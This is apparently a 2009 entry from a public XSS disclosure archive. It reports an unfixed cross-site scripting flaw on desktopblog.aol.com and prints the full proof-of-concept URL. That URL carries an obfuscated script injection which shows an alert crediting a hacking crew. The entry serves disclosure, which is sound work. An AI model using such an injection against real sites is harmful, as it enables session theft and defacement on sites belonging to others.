Security researcher Smokey, has submitted on 26/09/2009 a cross-site-scripting (XSS) vulnerability affecting desktopblog.aol.com, which at the time of submission ranked 35 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 26/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 26/09/2009 |
Date published: 26/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Smokey |
Domain: desktopblog.aol.com |
Category: XSS |
Pagerank: 35 |
URL: http://desktopblog.aol.com/search/?q=%22%27%3E%3Cscript%3Eeval%28String.fromCharCode%2897%2C108%2C10 1%2C114%2C116%2C40%2C34%2C88%2C83%2C83%2C32%2C102%2C111%2C117%2C110%2C100%2C32%2C98%2C121%2C32%2C83% 2C109%2C111%2C107%2C101%2C121%2C32%2C79%2C102%2C32%2C68%2C97%2C114%2C107%2C99%2C48%2C100%2C101%2C32% 2C72%2C97%2C99%2C107%2C99%2C105%2C110%2C103%2C32%2C67%2C114%2C101%2C119%2C34%2C41%2C59%29%29%3C%2Fsc ript%3E%3C%21-- |
Click here to view the mirror
|
|
|